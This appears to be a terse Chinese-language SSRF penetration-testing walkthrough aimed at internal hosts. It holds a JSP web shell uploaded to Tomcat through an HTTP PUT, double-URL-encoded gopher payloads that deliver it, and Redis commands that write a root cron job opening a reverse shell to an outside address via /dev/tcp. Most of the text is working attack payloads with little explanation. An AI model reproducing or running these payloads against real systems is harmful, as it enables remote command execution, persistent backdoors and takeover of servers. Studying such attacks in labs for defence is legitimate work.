5%36%65%25%36%37%25%32%63%25%32%61%25%32%66%25%32%61%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%38%25%32%63%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%33%25%36%39%25%36%37%25%36%65%25%36%35%25%36%34%25%32%64%25%36%35%25%37%38%25%36%33%25%36%38%25%36%31%25%36%65%25%36%37%25%36%35%25%33%62%25%37%36%25%33%64%25%36%32%25%33%33%25%33%62%25%37%31%25%33%64%25%33%30%25%32%65%25%33%37%25%30%64%25%30%61%25%35%32%25%36%35%25%36%36%25%36%35%25%37%32%25%36%35%25%37%32%25%33%61%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%32%25%32%65%25%33%31%25%33%38%25%33%33%25%33%61%25%33%38%25%33%30%25%33%38%25%33%38%25%32%66%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%62%25%36%35%25%36%35%25%37%30%25%32%64%25%36%31%25%36%63%25%36%39%25%37%36%25%36%35%25%30%64%25%30%61%25%30%64%25%30%61%25%36%39%25%37%30%25%33%64%25%33%31%25%33%32%25%33%37%25%32%65%25%33%30%25%32%65%25%33%30%25%32%65%25%33%31%25%33%62%25%36%39%25%36%34

内网172.72.23.26

是个tomcat

尝试进行历史漏洞利用

构造请求

PUT /1.jsp/ HTTP/1.1
Host: 172.72.23.26:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) out.print(new String(b, 0, a)); %>

payload

gopher:%2f%2f172.72.23.26:8080/_%25%35%30%25%35%35%25%35%34%25%32%30%25%32%66%25%33%31%25%32%65%25%36%61%25%37%33%25%37%30%25%32%66%25%32%30%25%34%38%25%35%34%25%35%34%25%35%30%25%32%66%25%33%31%25%32%65%25%33%31%25%30%64%25%30%61%25%34%38%25%36%66%25%37%33%25%37%34%25%33%61%25%32%30%25%33%31%25%33%37%25%33%32%25%32%65%25%33%37%25%33%32%25%32%65%25%33%32%25%33%33%25%32%65%25%33%32%25%33%36%25%33%61%25%33%38%25%33%30%25%33%38%25%33%30%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%33%61%25%32%30%25%32%61%25%32%66%25%32%61%25%30%64%25%30%61%25%34%31%25%36%33%25%36%33%25%36%35%25%37%30%25%37%34%25%32%64%25%34%63%25%36%31%25%36%65%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%61%25%32%30%25%36%35%25%36%65%25%30%64%25%30%61%25%35%35%25%37%33%25%36%35%25%37%32%25%32%64%25%34%31%25%36%37%25%36%35%25%36%65%25%37%34%25%33%61%25%32%30%25%34%64%25%36%66%25%37%61%25%36%39%25%36%63%25%36%63%25%36%31%25%32%66%25%33%35%25%32%65%25%33%30%25%32%30%25%32%38%25%36%33%25%36%66%25%36%64%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%63%25%36%35%25%33%62%25%32%30%25%34%64%25%35%33%25%34%39%25%34%35%25%32%30%25%33%39%25%32%65%25%33%30%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%36%34%25%36%66%25%37%37%25%37%33%25%32%30%25%34%65%25%35%34%25%32%30%25%33%36%25%32%65%25%33%31%25%33%62%25%32%30%25%35%37%25%36%39%25%36%65%25%33%36%25%33%34%25%33%62%25%32%30%25%37%38%25%33%36%25%33%34%25%33%62%25%32%30%25%35%34%25%37%32%25%36%39%25%36%34%25%36%35%25%36%65%25%37%34%25%32%66%25%33%35%25%32%65%25%33%30%25%32%39%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%36%65%25%36%35%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%33%61%25%32%30%25%36%33%25%36%63%25%36%66%25%37%33%25%36%35%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%35%34%25%37%39%25%37%30%25%36%35%25%33%61%25%32%30%25%36%31%25%37%30%25%37%30%25%36%63%25%36%39%25%36%33%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%32%66%25%37%38%25%32%64%25%37%37%25%37%37%25%37%37%25%32%64%25%36%36%25%36%66%25%37%32%25%36%64%25%32%64%25%37%35%25%37%32%25%36%63%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%36%34%25%30%64%25%30%61%25%34%33%25%36%66%25%36%65%25%37%34%25%36%35%25%36%65%25%37%34%25%32%64%25%34%63%25%36%35%25%36%65%25%36%37%25%37%34%25%36%38%25%33%61%25%32%30%25%33%32%25%33%30%25%33%32%25%30%64%25%30%61%25%30%64%25%30%61%25%33%63%25%32%35%25%32%30%25%36%61%25%36%31%25%37%36%25%36%31%25%32%65%25%36%39%25%36%66%25%32%65%25%34%39%25%36%65%25%37%30%25%37%35%25%37%34%25%35%33%25%37%34%25%37%32%25%36%35%25%36%31%25%36%64%25%32%30%25%36%39%25%36%65%25%32%30%25%33%64%25%32%30%25%35%32%25%37%35%25%36%65%25%37%34%25%36%39%25%36%64%25%36%35%25%32%65%25%36%37%25%36%35%25%37%34%25%35%32%25%37%35%25%36%65%25%37%34%25%36%39%25%36%64%25%36%35%25%32%38%25%32%39%25%32%65%25%36%35%25%37%38%25%36%35%25%36%33%25%32%38%25%37%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%32%65%25%36%37%25%36%35%25%37%34%25%35%30%25%36%31%25%37%32%25%36%31%25%36%64%25%36%35%25%37%34%25%36%35%25%37%32%25%32%38%25%32%32%25%36%33%25%36%64%25%36%34%25%32%32%25%32%39%25%32%39%25%32%65%25%36%37%25%36%35%25%37%34%25%34%39%25%36%65%25%37%30%25%37%35%25%37%34%25%35%33%25%37%34%25%37%32%25%36%35%25%36%31%25%36%64%25%32%38%25%32%39%25%33%62%25%32%30%25%36%39%25%36%65%25%37%34%25%32%30%25%36%31%25%32%30%25%33%64%25%32%30%25%32%64%25%33%31%25%33%62%25%32%30%25%36%32%25%37%39%25%37%34%25%36%35%25%35%62%25%35%64%25%32%30%25%36%32%25%32%30%25%33%64%25%32%30%25%36%65%25%36%35%25%37%37%25%32%30%25%36%32%25%37%39%25%37%34%25%36%35%25%35%62%25%33%32%25%33%30%25%33%34%25%33%38%25%35%64%25%33%62%25%32%30%25%37%37%25%36%38%25%36%39%25%36%63%25%36%35%25%32%38%25%32%38%25%36%31%25%33%64%25%36%39%25%36%65%25%32%65%25%37%32%25%36%35%25%36%31%25%36%34%25%32%38%25%36%32%25%32%39%25%32%39%25%32%31%25%33%64%25%32%64%25%33%31%25%32%39%25%32%30%25%36%66%25%37%35%25%37%34%25%32%65%25%37%30%25%37%32%25%36%39%25%36%65%25%37%34%25%32%38%25%36%65%25%36%35%25%37%37%25%32%30%25%35%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%38%25%36%32%25%32%63%25%32%30%25%33%30%25%32%63%25%32%30%25%36%31%25%32%39%25%32%39%25%33%62%25%32%30%25%32%35%25%33%65%25%30%64%25%30%61

访问jsp

内网172.72.23.27

端口为6379,尝试写计划任务

# terminal1
nc -l 9900 -k -C > payload
# terminal2
timeout 0.5 redis-cli -p 9900 CONFIG SET dir /var/spool/cron/
timeout 0.5 redis-cli -p 9900 CONFIG SET dbfilename root
timeout 0.5 redis-cli -p 9900 set test $'\n* * * * * /bin/bash -i >& /dev/tcp/192.168.2.183/4444 0>&1\n'
timeout 0.5 redis-cli -p 9900 SAVE

将payload中内容进行两次url编码即可获得payload

payload

gopher:%2f%2f172.72.23.27:6379/_%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%34%33%25%34%66%25%34%65%25%34%36%25%34%39%25%34%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%35%33%25%34%35%25%35%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34%25%33%31%25%33%36%25%30%64%25%30%61%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%32%66%25%30%64%25%30%61%25%32%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%34%33%25%34%66%25%34%65%25%34%36%25%34%39%25%34%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%35%33%25%34%35%25%35%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%32%25%36%66%25%36%66%25%37%34%25%30%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%34%25%36%35%25%37%33%25%37%34%25%30%64%25%30%61%25%32%34%25%33%36%25%33%32%25%30%64%25%30%61%25%30%61%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%66%25%36%32%25%36%39%25%36%65%25%32%66%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%32%25%32%65%25%33%31%25%33%38%25%33%33%25%32%66%25%33%34%25%33%34%25%33%34%25%33%34%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%30%61%25%30%61%25%30%64%25%30%61%25%30%64%25%30%61%25%30%64%25%30%61%25%32%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%35%33%25%34%31%25%35%36%25%34%35%25%30%64%25%30%61